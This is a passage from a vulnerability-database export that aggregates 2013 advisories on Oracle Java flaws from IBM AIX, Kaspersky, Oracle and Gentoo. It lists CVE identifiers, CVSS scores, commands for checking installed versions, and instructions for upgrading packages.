Undefined\n CVSS Vector: (AV/N:AC/M:Au/S:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5803\n CVSS Base Score: 2.6\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88008 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/H:Au/N:C/N:I/N:A/P)\n\n CVEID: CVE-2013-5772\n CVSS Base Score: 2.6\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88007 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/H:Au/N:C/N:I/P:A/N) \n\n| III. PLATFORM VULNERABILITY ASSESSMENT\n\n| To determine if your system is vulnerable, run the following commands for the Java version\n| on your system:\n\n| # lslpp -l | grep Java | grep sdk\n| # lslpp -l | grep Java | grep jre\n\n| The following fileset levels (VRMF) are vulnerable, if the respective Java version is installed:\n| For Java5: Less than 5.0.0.560\n| For Java6: Less than 6.0.0.435\n| For Java7: Less than 7.0.0.110\n\n| Java7 Release 1: 7.1.0.000 is NOT vulnerable\n\nIV. FIXES\n\n AFFECTED PRODUCTS AND VERSIONS:\n AIX 5.3\n AIX 6.1\n AIX 7.1\n PowerSC \n| VIOS 2.2.x\n\n REMEDIATION:\n IBM SDK, Java 2 Technology Edition, Version 5.0 Service Refresh 16 Fix Pack 4 and later\n 32-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix32j5b&S_TACT=105AGX05&S_CMP=JDK\n 64-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix64j5b&S_TACT=105AGX05&S_CMP=JDK\n\n IBM SDK, Java Technology Edition, Version 6 Service Refresh 15 and later\n 32-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix32j6b&S_TACT=105AGX05&S_CMP=JDK\n 64-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix64j6b&S_TACT=105AGX05&S_CMP=JDK\n\n IBM SDK, Java Technology Edition, Version 7 Service Refresh 6 and later\n 32-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix32j7b&S_TACT=105AGX05&S_CMP=JDK\n 64-bit: https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=dka&S_PKG=aix64j7b&S_TACT=105AGX05&S_CMP=JDK\n\n To learn more about AIX support levels and Java service releases, see the following:\n http://www.ibm.com/developerworks/java/jdk/aix/service.html#levels\n\nV. WORKAROUNDS\n\n None\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq \n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To request the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n CVE-2013-5456: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5456\n CVE-2013-5457: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5457\n CVE-2013-5458: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5458 \n CVE-2013-4041: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4041 \n CVE-2013-5375: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5375\n CVE-2013-5372: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5372\n CVE-2013-5843: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5843\n CVE-2013-5789: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5789\n CVE-2013-5830: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830\n CVE-2013-5829: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829 \n CVE-2013-5787: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5787\n CVE-2013-5788: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5788\n CVE-2013-5824: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5824\n CVE-2013-5842: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842\n CVE-2013-5782: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782\n CVE-2013-5817: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817\n CVE-2013-5809: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809\n CVE-2013-5814: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814\n CVE-2013-5832: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5832\n CVE-2013-5850: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850\n CVE-2013-5838: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5838\n CVE-2013-5802: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802\n CVE-2013-5812: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5812\n CVE-2013-5804: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804\n CVE-2013-5783: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783\n CVE-2013-3829: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829\n CVE-2013-5823: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823\n CVE-2013-5831: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5831\n CVE-2013-5820: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820\n CVE-2013-5819: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5819\n CVE-2013-5818: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5818\n CVE-2013-5848: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5848\n CVE-2013-5776: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5776\n CVE-2013-5774: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774\n CVE-2013-5825: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825\n CVE-2013-5840: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840\n CVE-2013-5801: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5801\n CVE-2013-5778: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778\n CVE-2013-5851: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5851\n CVE-2013-5800: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5800\n CVE-2013-5784: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784\n CVE-2013-5849: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849\n CVE-2013-5790: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790\n CVE-2013-5780: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780\n CVE-2013-5797: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797\n CVE-2013-5803: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803\n CVE-2013-5772: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlLvxe4ACgkQ4fmd+Ci/qhIyJwCghirbKIbzL2db7Xa9FO8OqgQE\n6OsAni19Xm6ZmA0RHMjPG46p/4wk8p8D\n=rWHF\n-----END PGP SIGNATURE-----\n", "published": "2013-12-11T10:53:34", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://aix.software.ibm.com/aix/efixes/security/java_advisory.asc", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5818", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5776", "CVE-2013-5788", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5456", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5458", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5457", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-10-24T17:48:11"}], "kaspersky": [{"id": "KLA10492", "type": "kaspersky", "title": "\r KLA10492Multiple vulnerabilities in Oracle products\t\t\t ", "description": "### *CVSS*:\n10.0\n\n### *Detect date*:\n10/16/2013\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Oracle products. By exploiting these vulnerabilities malicious users can affect integrity, confidentiality and availability. These vulnerabilities can be exploited remotely via an unknwn vectors related to CORBA, JNDI, BEANS, AWT, JAX-WS, Security, JGSS, Javadoc, SCRIPTING, JavaFX, Swing, Libraries, jhat, Deployment, 2D, JAXP and other unknown vectors.\n\n### *Affected products*:\nOracle Java SE 7 versions 7.40 and earlier \nOracle Java SE 6 versions 6.60 and earlier \nOracle Java SE 5 versions 5.51 and earlier \nOracle JRockit R28 versions 28.2.8 and earlier \nOracle JRockit R27 versions 27.7.6 and earlier\n\n### *Solution*:\nUpdate to latest version! \n[Java SE download page](<http://www.oracle.com/technetwork/java/javase/downloads/index.html>)\n\n### *Original advisories*:\n[Oracle bulletin](<http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Sun Java JRE 1.6.x](<https://threats.kaspersky.com/en/product/Sun-Java-JRE-1.6.x/>)\n\n### *CVE-IDS*:\n[CVE-2013-5830](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5830>) \n[CVE-2013-5831](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5831>) \n[CVE-2013-5832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5832>) \n[CVE-2013-5838](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5838>) \n[CVE-2013-5825](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5825>) \n[CVE-2013-5778](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5778>) \n[CVE-2013-5777](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5777>) \n[CVE-2013-5776](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5776>) \n[CVE-2013-5775](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5775>) \n[CVE-2013-5774](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5774>) \n[CVE-2013-5772](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5772>) \n[CVE-2013-5840](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5840>) \n[CVE-2013-5782](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5782>) \n[CVE-2013-5783](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5783>) \n[CVE-2013-5843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5843>) \n[CVE-2013-5842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5842>) \n[CVE-2013-5809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5809>) \n[CVE-2013-5844](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5844>) \n[CVE-2013-5784](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5784>) \n[CVE-2013-5846](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5846>) \n[CVE-2013-5805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5805>) \n[CVE-2013-5804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5804>) \n[CVE-2013-5788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5788>) \n[CVE-2013-5789](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5789>) \n[CVE-2013-5801](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5801>) \n[CVE-2013-5800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5800>) \n[CVE-2013-5803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5803>) \n[CVE-2013-5802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5802>) \n[CVE-2013-5780](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5780>) \n[CVE-2013-5787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5787>) \n[CVE-2013-5824](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5824>) \n[CVE-2013-5823](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5823>) \n[CVE-2013-5820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5820>) \n[CVE-2013-5797](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797>) \n[CVE-2013-4002](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4002>) \n[CVE-2013-5829](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5829>) \n[CVE-2013-5849](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5849>) \n[CVE-2013-5848](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5848>) \n[CVE-2013-5806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5806>) \n[CVE-2013-3829](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3829>) \n[CVE-2013-5854](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5854>) \n[CVE-2013-5852](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5852>) \n[CVE-2013-5790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5790>) \n[CVE-2013-5850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5850>) \n[CVE-2013-5851](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5851>) \n[CVE-2013-5818](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5818>) \n[CVE-2013-5819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5819>) \n[CVE-2013-5817](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5817>) \n[CVE-2013-5814](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5814>) \n[CVE-2013-5812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5812>) \n[CVE-2013-5810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5810>)", "published": "2013-10-16T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10492", "cvelist": ["CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5776", "CVE-2013-5788", "CVE-2013-5842", "CVE-2013-5810", "CVE-2013-5830", "CVE-2013-5832", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5787", "CVE-2013-5852", "CVE-2013-5854", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5825", "CVE-2013-5789", "CVE-2013-5823", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5814", "CVE-2013-5775", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5819", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-03-30T14:11:40"}], "oracle": [{"id": "ORACLE:CPUOCT2013-1899837", "type": "oracle", "title": "Oracle Critical Patch Update - October 2013", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** Starting Oct 2013, the Java SE Critical Patch Update will be released quarterly every year as per the main Oracle Critical Patch Update Schedule. This Critical Patch Update contains 127 new security fixes (including 51 Java fixes) across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "published": "2013-10-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2013-3792", "CVE-2012-2750", "CVE-2013-2248", "CVE-2013-5856", "CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-3839", "CVE-2013-5779", "CVE-2013-5807", "CVE-2013-4002", "CVE-2013-3831", "CVE-2013-5850", "CVE-2013-3840", "CVE-2013-5778", "CVE-2013-3827", "CVE-2013-3833", "CVE-2013-5867", "CVE-2013-0169", "CVE-2013-3828", "CVE-2013-3785", "CVE-2013-5862", "CVE-2013-5762", "CVE-2013-3766", "CVE-2013-2172", "CVE-2013-5776", "CVE-2013-5827", "CVE-2013-5788", "CVE-2013-5765", "CVE-2013-5773", "CVE-2013-3841", "CVE-2013-5842", "CVE-2013-2251", "CVE-2013-3836", "CVE-2013-5836", "CVE-2013-5810", "CVE-2013-3762", "CVE-2013-5830", "CVE-2013-5859", "CVE-2013-5832", "CVE-2013-5864", "CVE-2013-5841", "CVE-2013-5845", "CVE-2013-5813", "CVE-2013-3814", "CVE-2013-5763", "CVE-2013-5839", "CVE-2013-5784", "CVE-2013-5792", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-3838", "CVE-2013-5771", "CVE-2011-3389", "CVE-2013-5787", "CVE-2013-3835", "CVE-2013-5852", "CVE-2013-3834", "CVE-2013-5828", "CVE-2013-5854", "CVE-2013-5768", "CVE-2013-5806", "CVE-2013-0149", "CVE-2013-5805", "CVE-2013-5826", "CVE-2013-5857", "CVE-2013-5825", "CVE-2013-5811", "CVE-2013-5789", "CVE-2013-5822", "CVE-2013-5823", "CVE-2013-5837", "CVE-2013-2461", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5769", "CVE-2013-5865", "CVE-2013-5780", "CVE-2013-3842", "CVE-2013-3624", "CVE-2013-5761", "CVE-2013-5791", "CVE-2013-5816", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5847", "CVE-2013-2134", "CVE-2013-5799", "CVE-2013-5814", "CVE-2013-5798", "CVE-2013-5766", "CVE-2013-5775", "CVE-2013-5863", "CVE-2013-2135", "CVE-2013-5829", "CVE-2013-5786", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5796", "CVE-2013-5861", "CVE-2013-5781", "CVE-2013-5835", "CVE-2013-3826", "CVE-2013-5819", "CVE-2013-5770", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5767", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-3832", "CVE-2013-5793", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-3837", "CVE-2013-5838", "CVE-2013-5794", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5866", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772", "CVE-2013-5815"], "lastseen": "2018-04-18T20:24:09"}], "gentoo": [{"id": "GLSA-201401-30", "type": "gentoo", "title": "Oracle JRE/JDK: Multiple vulnerabilities", "description": "### Background\n\nThe Oracle Java Development Kit (JDK) (formerly known as Sun JDK) and the Oracle Java Runtime Environment (JRE) (formerly known as Sun JRE) provide the Oracle Java platform (formerly known as Sun Java Platform). \n\n### Description\n\nMultiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nAn unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jdk-bin-1.7.0.51\"\n \n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/oracle-jre-bin-1.7.0.51\"\n \n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=app-emulation/emul-linux-x86-java-1.7.0.51\"\n \n\nAll Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. \n\nNOTE: As Oracle has revoked the DLJ license for its Java implementation, the packages can no longer be updated automatically.", "published": "2014-01-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/201401-30", "cvelist": ["CVE-2013-2418", "CVE-2012-5089", "CVE-2013-2431", "CVE-2013-2468", "CVE-2013-2420", "CVE-2013-5889", "CVE-2013-2384", "CVE-2013-2415", "CVE-2013-5848", "CVE-2012-1711", "CVE-2013-1491", "CVE-2013-1571", "CVE-2013-5782", "CVE-2013-5846", "CVE-2012-1541", "CVE-2013-2417", "CVE-2013-0402", "CVE-2013-5818", "CVE-2013-2433", "CVE-2013-1500", "CVE-2013-2448", "CVE-2013-2416", "CVE-2013-2427", "CVE-2013-0401", "CVE-2012-5074", "CVE-2012-5073", "CVE-2012-1725", "CVE-2014-0385", "CVE-2013-2424", "CVE-2013-5878", "CVE-2013-5850", "CVE-2013-2407", "CVE-2012-1533", "CVE-2013-5778", "CVE-2013-2456", "CVE-2013-0448", "CVE-2014-0410", "CVE-2013-2436", "CVE-2013-2454", "CVE-2013-2470", "CVE-2013-1485", "CVE-2013-1479", "CVE-2013-2462", "CVE-2013-0169", "CVE-2014-0415", "CVE-2013-2414", "CVE-2012-1719", "CVE-2013-2394", "CVE-2011-3563", "CVE-2013-5870", "CVE-2013-2421", "CVE-2012-3159", "CVE-2013-1518", "CVE-2013-5776", "CVE-2012-5087", "CVE-2013-5788", "CVE-2013-5905", "CVE-2013-0809", "CVE-2013-5904", "CVE-2013-5888", "CVE-2013-2452", "CVE-2012-3342", "CVE-2013-2451", "CVE-2013-5893", "CVE-2013-5842", "CVE-2014-0387", "CVE-2012-5085", "CVE-2012-5076", "CVE-2013-5810", "CVE-2013-5830", "CVE-2013-2473", "CVE-2012-5079", "CVE-2012-4416", "CVE-2013-5898", "CVE-2012-0507", "CVE-2012-5075", "CVE-2013-1473", "CVE-2013-5832", "CVE-2012-3136", "CVE-2013-1488", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2014-0375", "CVE-2012-5081", "CVE-2012-5067", "CVE-2013-5817", "CVE-2012-0503", "CVE-2012-3174", "CVE-2011-5035", "CVE-2013-2419", "CVE-2012-1723", "CVE-2013-2463", "CVE-2013-1563", "CVE-2013-2469", "CVE-2013-5787", "CVE-2013-5852", "CVE-2012-1726", "CVE-2014-0418", "CVE-2013-0351", "CVE-2013-2465", "CVE-2014-0373", "CVE-2013-1537", "CVE-2013-3743", "CVE-2013-5854", "CVE-2012-0498", "CVE-2013-5806", "CVE-2013-5805", "CVE-2013-5887", "CVE-2012-0506", "CVE-2014-0408", "CVE-2013-5825", "CVE-2012-1717", "CVE-2012-1721", "CVE-2014-0376", "CVE-2013-2423", "CVE-2014-0422", "CVE-2013-5789", "CVE-2014-0411", "CVE-2013-2439", "CVE-2013-1561", "CVE-2013-5823", "CVE-2013-0409", "CVE-2013-5895", "CVE-2013-0438", "CVE-2012-1713", "CVE-2013-2461", "CVE-2012-1716", "CVE-2013-2428", "CVE-2012-5083", "CVE-2013-5843", "CVE-2012-5088", "CVE-2013-5899", "CVE-2013-2429", "CVE-2013-5812", "CVE-2013-5849", "CVE-2012-5086", "CVE-2013-5896", "CVE-2013-2471", "CVE-2012-0497", "CVE-2012-1532", "CVE-2012-5077", "CVE-2013-1486", "CVE-2014-0417", "CVE-2013-5780", "CVE-2013-5910", "CVE-2013-1487", "CVE-2013-5906", "CVE-2013-0430", "CVE-2013-0445", "CVE-2012-5069", "CVE-2014-0428", "CVE-2012-3216", "CVE-2014-0382", "CVE-2012-0505", "CVE-2013-5824", "CVE-2012-5084", "CVE-2013-5831", "CVE-2012-1718", "CVE-2013-2440", "CVE-2013-2434", "CVE-2013-2464", "CVE-2013-2458", "CVE-2012-3213", "CVE-2013-2459", "CVE-2012-5071", "CVE-2013-5814", "CVE-2013-2442", "CVE-2012-0499", "CVE-2012-0501", "CVE-2013-0446", "CVE-2013-2432", "CVE-2012-1722", "CVE-2014-0368", "CVE-2013-2443", "CVE-2014-0423", "CVE-2013-1481", "CVE-2013-5775", "CVE-2013-2446", "CVE-2012-0547", "CVE-2013-5829", "CVE-2013-5803", "CVE-2012-5072", "CVE-2013-2450", "CVE-2013-2400", "CVE-2013-2472", "CVE-2013-2438", "CVE-2013-1540", "CVE-2012-0500", "CVE-2013-2467", "CVE-2013-5907", "CVE-2013-1493", "CVE-2013-5902", "CVE-2012-1531", "CVE-2013-2444", "CVE-2013-3744", "CVE-2013-2447", "CVE-2013-2457", "CVE-2013-5844", "CVE-2013-0437", "CVE-2012-4681", "CVE-2013-2437", "CVE-2013-2453", "CVE-2013-1557", "CVE-2012-0504", "CVE-2013-2426", "CVE-2014-0424", "CVE-2013-2455", "CVE-2013-5819", "CVE-2013-2422", "CVE-2013-2435", "CVE-2013-2383", "CVE-2013-1484", "CVE-2013-1564", "CVE-2013-1558", "CVE-2013-5774", "CVE-2012-1724", "CVE-2013-0422", "CVE-2012-5068", "CVE-2014-0403", "CVE-2013-3829", "CVE-2012-1682", "CVE-2012-3143", "CVE-2012-0502", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-2425", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-1569", "CVE-2013-5838", "CVE-2013-2412", "CVE-2013-0449", "CVE-2013-2445", "CVE-2013-2430", "CVE-2013-2460", "CVE-2013-5840", "CVE-2013-5801", "CVE-2014-0416", "CVE-2013-2449", "CVE-2013-2466", "CVE-2012-5070", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-0423", 